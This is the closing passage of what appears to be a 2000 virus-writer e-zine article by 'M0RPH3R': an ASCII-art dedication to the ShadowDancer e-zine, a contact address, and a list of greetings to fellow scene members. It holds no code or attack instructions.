                                          | metamorphozer@programmer.net |
                                          '------------------------------'



.-------------------------------------------------.----------------------.
|   Special dedication to ShadowDancer E-Zine !   |  -= ShadowDancer =-  '
|  [ URL : http://www.coderz.net/ShadowDancer/ ]  |----------------------'
|-------------------------------------------------| M0RPH3RM374M0RPH023R |
| (c)2000, M0RPH3R - Survival of The Smartest !   |----------------------'
|          E-MaiL  : metamorphozer@programmer.net | June, 8th 2000 10:15 '
'-------------------------------------------------'----------------------'
.-------------.
| GReeTZ To : |
|-------------'----------------------------------------------------------.
| - Members of ShadowDancer :   ( ... let's dance like a shadow ... )    |
|   Daze Shadow  [ 'Ow 'r u ? ]                                          |
|   Ding Lik     [ Thanx for the invitation ! ]                          |
|   M0RPH3R      [ That's my name ! X-D ]                                |
| - WebMaster of coderz.net & friends ...                                |
|   [ coderz.net ... there's really cool place to visit ! ]              |
| - Mr. Q        [ 'metamorphozer' is kewl name huh, thanx man !         |
|                  You're really my 8357 fr13nd ... ]                    |
| - Cicatrix     [ Please add any shortcuts (full keyboard support) in - |
|                  your cute VDAT, coz I have no mouse anymore ... :-| ] |
| - CyberPhantom [ Where's another Cyber ... ? :-) ]                     |
| - Dark Night   [ Where's The Nightmare Joker ? :-) ]                   |
| - The Nightmare Joker [ Where's Dark Night ? :-) ]                     |
| - VeggieTailz  [ Nice to know you girl ! ;-) ]                         |
| - VicodinES    [ CPCK/VMPCK/...CK - get better in executable file ! ]  |
|                  DOC/DOT format - is so easy to HaCK ... :-| ]         |
| - All VXers around the universe, esspecially Indonesian VXers !        |
'------------------------------------------------------------------------'

PS : Semua ini hanyalah sisi lain dari isi otak ...

                                       __  __  __  ___  ___ _   _ ___ ___
                                      |  \/  |/  \| _ \| _ \ |_| |__ / _ \
                                      | |\/| | () |   /|  _/  _  ||_ \   /
                                      |_|  |_|\__/|_|_\|_| |_| |_|___/_|_\
                                       M0RPH3R - Survival of The Smartest
'--[ metamorphozer@programmer.net ]-----------------------------[ EOF ]--'